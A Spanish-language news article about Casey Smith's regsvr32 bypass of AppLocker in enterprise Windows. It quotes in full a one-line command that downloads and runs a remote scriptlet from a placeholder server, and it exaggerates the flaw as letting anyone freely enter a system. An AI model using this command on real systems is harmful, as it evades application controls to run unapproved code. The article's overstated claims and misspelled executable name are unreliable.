Fallo de Vulnerabilidad en Windows: Permite acceso libre a todo el mundo
El mundo de la computación está configurado para que en la medida de lo posible proporcione herramientas y servicios que sean altamente confiables y sobre todo seguros ante posibles…
El mundo de la computación está configurado para que en la medida de lo posible proporcione herramientas y servicios que sean altamente confiables y sobre todo seguros ante posibles ataques de Hackers. Ahora le toco a Windows versión empresarial donde se detectó una vulnerabilidad que aunque no se crea deja una posibilidad abierta para que cualquiera pueda acceder como ¡Pedro por su casa!
Los que trabajan con la seguridad de sistemas informáticos realizan miles de pruebas con Scripts para tratar de abarcar una amplia gama de posibilidades de fallos y así tener una estructura física y lógica estable. Pero la ley de Murphy siempre deja un sabor amargo a la afanada búsqueda de problemas en los sistemas de cómputo.
El experto en seguridad Casey Smith encontró que la versión 7 en adelante del Windows empresarial tiene una vulnerabilidad de seguridad importante que permite a los Hackers hacer muchas cosas sin restricción alguna.
El AppLocker se incorporó a partir de la versión 7 del Windows empresarial para mitigar problemas de seguridad entre las funciones que controla está la de permitir o no la incorporación y uso de software por grupos de usuarios en entornos corporativos por tipos de archivos programando incluso cuando pueden usar las aplicaciones los usuarios. Todo esto con la idea de maximizar el uso de recursos y controlar la intromisión de Malware al sistema empresarial.
¿Qué detecto Casey Smith y como lo hizo?
Según colgó en su sitio web buscando una solución para un requerimiento en Windows empresarial de su empresa descubrió que el ejecutable Regsrv32.exe tenía un punto vulnerable a los Scripts (descargas y ejecución) desde Internet.
El Regsrv32.exe viene en la librería básica de Windows empresarial al dejar un espacio abierto, con la posibilidad de ser accesible vía conexión proxy, porredireccionamiento o TLS es preocupante y ante el cual pronto debe encontrarse una solución para evitar la propagación de ataques inescrupulosos. En guerra avisada no muere soldado.
Lo peor es que con el AppLocker activo puede vulnerarse la seguridad de Windows al alterar el Regsrv32.exe no se requiere ningún privilegio de acceso como por ejemplo ser administrador. Es decir cualquiera puede entrar al sistema.
Esta fue la línea de comando que ejecuto Smith Regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, cambio la parte de la URL por un comando sencillo y básico “cmd.exe” y paso sin problema. Él dejo claro que el comando puede ser sustituido por un programa, un Script y sucederá lo mismo, Acceso Libre a todo. ¡Es increíble, pero cierto!
Windows no ha realizado ninguna aclaratoria y algunos usuarios se han visto en la necesidad de bloquear al ejecutable Regsrv32.exe con el corta fuegos de Windows mientras aparece una nueva versión que solucione el problema.
Fuente